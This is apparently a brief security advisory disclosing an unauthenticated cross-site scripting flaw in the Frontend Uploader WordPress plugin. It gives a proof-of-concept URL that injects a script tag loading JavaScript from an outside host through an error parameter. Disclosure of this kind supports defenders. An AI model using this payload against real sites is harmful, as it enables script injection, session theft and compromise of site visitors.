The Frontend Uploader WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability.
PoC
http://localhost:8080/?page_id=0&&errors;[fu-disallowed-mime-type][0][name]=<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >